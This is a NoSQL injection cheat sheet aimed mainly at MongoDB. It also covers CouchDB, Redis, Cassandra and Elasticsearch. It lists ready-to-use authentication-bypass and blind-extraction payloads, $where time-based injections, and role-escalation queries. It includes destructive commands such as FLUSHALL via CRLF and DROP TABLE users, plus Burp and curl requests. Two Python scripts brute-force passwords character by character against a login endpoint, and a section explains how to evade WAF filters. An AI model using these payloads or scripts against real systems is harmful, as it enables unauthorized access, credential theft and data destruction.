=== MONGODB AUTHENTICATION BYPASS ===

# JSON Format
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$gte": ""}}
{"username": "admin", "password": {"$exists": true}}
{"username": "admin", "password": {"$regex": ".*"}}
{"username": "admin", "password": {"$regex": "^.*$"}}

# Both username and password
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

# Target specific users
{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}

=== URL-ENCODED FORMAT (GET/POST) ===

# Basic bypass
username=admin&password[$ne]=
username=admin&password[$gt]=
username=admin&password[$exists]=true
username=admin&password[$regex]=.*

# Both fields
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$exists]=true&password[$exists]=true

# Array syntax
username[$in][]=admin&username[$in][]=administrator&password[$ne]=

# Fully URL encoded
username=admin&password%5B%24ne%5D=
username%5B%24ne%5D=&password%5B%24ne%5D=

=== MONGODB OPERATORS ===

# Comparison
$eq    // Equal
$ne    // Not equal
$gt    // Greater than
$gte   // Greater than or equal
$lt    // Less than
$lte   // Less than or equal
$in    // In array
$nin   // Not in array

# Logical
$and
$or
$not
$nor

# Element
$exists
$type

# Evaluation
$regex
$where
$expr
$text
$mod

# Array
$all
$elemMatch
$size

=== REGEX-BASED EXTRACTION ===

# Test if password starts with 'a'
{"username": "admin", "password": {"$regex": "^a"}}

# Test if password starts with 'ab'
{"username": "admin", "password": {"$regex": "^ab"}}

# Test password length (5 characters)
{"username": "admin", "password": {"$regex": "^.{5}$"}}

# Case insensitive
{"username": "admin", "password": {"$regex": "^admin", "$options": "i"}}

# Match pattern
{"username": "admin", "password": {"$regex": "^flag\\{"}}

# Character class
{"username": "admin", "password": {"$regex": "^[a-z]"}}
{"username": "admin", "password": {"$regex": "^[0-9]"}}

=== BLIND NOSQL INJECTION ===

# Test password length
{"password": {"$regex": "^.{1}$"}}
{"password": {"$regex": "^.{5}$"}}
{"password": {"$regex": "^.{10}$"}}

# Extract character by character
{"password": {"$regex": "^a"}}
{"password": {"$regex": "^b"}}
{"password": {"$regex": "^c"}}

# Second character (if first is 'p')
{"password": {"$regex": "^pa"}}
{"password": {"$regex": "^pb"}}
{"password": {"$regex": "^pc"}}

# Binary search approach
{"password": {"$regex": "^[a-m]"}}  # First half of alphabet
{"password": {"$regex": "^[n-z]"}}  # Second half

=== $WHERE JAVASCRIPT INJECTION ===

# Basic bypass
{"$where": "1==1"}
{"$where": "true"}
{"$where": "return true"}

# Sleep for time-based
{"$where": "sleep(5000)"}
{"$where": "sleep(5000) || true"}

# Extract data
{"$where": "this.password[0] == 'a'"}
{"$where": "this.password[1] == 'b'"}
{"$where": "this.password.match(/^a/)"}

# String injection (if input in quotes)
' || 'a'=='a
' || 1==1 || 'a'=='a
'; return true; var x='

=== AUTHENTICATION BYPASS VARIATIONS ===

# Using $or
{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$ne": ""}}

# Using $and (bypass filters)
{"$and": [{"username": "admin"}, {"password": {"$ne": ""}}]}

# Using $nor (inverse logic)
{"username": "admin", "$nor": [{"password": {"$eq": "wrongpass"}}]}

# Nested operators
{"username": "admin", "password": {"$not": {"$eq": "wrongpass"}}}

=== EXTRACTING DATA ===

# Get all users (if no username specified)
{"username": {"$ne": ""}, "password": {"$ne": ""}}

# Get first user
{"password": {"$ne": ""}}

# Get users with specific pattern
{"username": {"$regex": "^admin"}}
{"email": {"$regex": "@admin.com$"}}

# Extract email
{"username": "admin", "email": {"$regex": "^a"}}
{"username": "admin", "email": {"$regex": "^ad"}}

=== TIME-BASED BLIND INJECTION ===

# Using $where with sleep (MongoDB)
{"$where": "sleep(5000)"}
{"$where": "if (this.password[0] == 'a') { sleep(5000); } return true;"}

# Conditional sleep
{"username": "admin", "$where": "if (this.password.match(/^a/)) { sleep(5000); }"}

=== AUTHORIZATION BYPASS ===

# Escalate to admin
{"username": {"$ne": ""}, "role": "admin"}
{"username": "user", "role": {"$ne": "user"}}

# Bypass role check
{"$or": [{"role": "admin"}, {"role": "superuser"}]}

=== MULTIPLE INJECTION POINTS ===

# Login
{"username": {"$ne": ""}, "password": {"$ne": ""}}

# Search
{"search": {"$regex": ".*"}}
{"search": {"$where": "1==1"}}

# Update
{"_id": {"$ne": ""}, "update": {"role": "admin"}}

=== COUCHDB INJECTION ===

# Authentication bypass
{"selector": {"username": "admin", "password": {"$ne": ""}}}

# All documents
{"selector": {"_id": {"$gt": null}}}

# Regex
{"selector": {"password": {"$regex": ".*"}}}

=== REDIS COMMAND INJECTION ===

# Command injection via CRLF
key=test\r\nFLUSHALL\r\n
key=test\r\nSET hacked "owned"\r\n
key=test\r\nGET flag\r\n

# Multiple commands
key=test\r\nKEYS *\r\n
key=test\r\nCONFIG GET *\r\n

=== CASSANDRA CQL INJECTION ===

# Similar to SQL injection
username: admin' OR '1'='1
username: admin' OR 1=1--
username: admin'; DROP TABLE users;--

=== ELASTICSEARCH INJECTION ===

# Query DSL injection
{"query": {"match_all": {}}}
{"query": {"bool": {"must_not": {"term": {"password": "wrong"}}}}}

=== BURP SUITE PAYLOADS ===

# Send in Repeater
POST /login HTTP/1.1
Content-Type: application/json

{"username": "admin", "password": {"$ne": ""}}

# Or URL-encoded
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=admin&password[$ne]=

=== PYTHON AUTOMATION SCRIPTS ===

# Extract password character by character
import requests
import string

url = "http://target.com/login"
chars = string.ascii_lowercase + string.digits + "_"
password = ""

for pos in range(20):
    for char in chars:
        payload = {
            "username": "admin",
            "password": {"$regex": f"^{password}{char}"}
        }
        r = requests.post(url, json=payload)
        if "success" in r.text.lower() or r.status_code == 200:
            password += char
            print(f"Found: {password}")
            break

print(f"Password: {password}")

=== EXTRACT PASSWORD LENGTH ===

import requests

url = "http://target.com/login"

for length in range(1, 50):
    payload = {
        "username": "admin",
        "password": {"$regex": f"^.{{{length}}}$"}
    }
    r = requests.post(url, json=payload)
    if "success" in r.text.lower():
        print(f"Password length: {length}")
        break

=== COMMON CTF PATTERNS ===

# Bypass login
{"username": "admin", "password": {"$ne": ""}}

# Extract flag from password
{"username": "admin", "password": {"$regex": "^flag{"}}
{"username": "admin", "password": {"$regex": "^flag{a"}}
{"username": "admin", "password": {"$regex": "^flag{CT"}}

# Get all users
{"username": {"$ne": ""}, "password": {"$ne": ""}}

# Find admin
{"role": "admin", "password": {"$ne": ""}}

=== PAYLOAD ENCODING ===

# URL encode special characters
$ = %24
[ = %5B
] = %5D
{ = %7B
} = %7D

# Example
password[$ne]= becomes password%5B%24ne%5D=

=== FILTER BYPASSES ===

# If $ne is blocked, try:
$gt
$gte
$regex
$exists
$nin

# If operators are filtered, try:
{"password": {"$not": {"$eq": "wrongpass"}}}

# Unicode tricks
\u0024ne instead of $ne
\u0024gt instead of $gt

=== DETECTING NOSQL ===

# Test for NoSQL
1. Try {"$ne": ""} in JSON
2. Try [$ne]= in URL params
3. Look for MongoDB errors
4. Check Content-Type: application/json

# Confirm with different operators
{"$ne": ""}
{"$gt": ""}
{"$regex": ""}

=== QUICK CTF WORKFLOW ===

# Step 1: Test basic injection
POST /login
{"username": "admin", "password": {"$ne": ""}}

# Step 2: If successful, try to extract data
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^fl"}}
{"username": "admin", "password": {"$regex": "^flag{"}}

# Step 3: Automate extraction
# Use Python script above

=== COMMON ENDPOINTS ===

/login
/api/login
/auth
/authenticate
/signin
/api/auth
/user/login

=== RESPONSE INDICATORS ===

# Successful bypass
"success": true
"logged_in": true
"token": "..."
Status: 200
Redirect to /dashboard

# Failed
"success": false
"error": "Invalid credentials"
Status: 401

=== TESTING CHECKLIST ===

☐ Test {"$ne": ""}
☐ Test {"$gt": ""}
☐ Test {"$regex": ".*"}
☐ Test URL-encoded [$ne]=
☐ Test both username and password
☐ Try different operators
☐ Look for error messages
☐ Check response differences
☐ Try blind regex extraction
☐ Automate with script

=== TOOLS ===

# NoSQLMap
nosqlmap -u http://target.com/login --injection --param username,password

# Manual with curl
curl -X POST http://target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$ne":""}}'

# Burp Suite
Use Repeater to test different operators

=== DEFENSIVE INDICATORS ===

# WAF might block
$ne
$gt
$regex
operators

# Try encoding
%24ne
\u0024ne

# Try alternatives
{"$not": {"$eq": "wrong"}}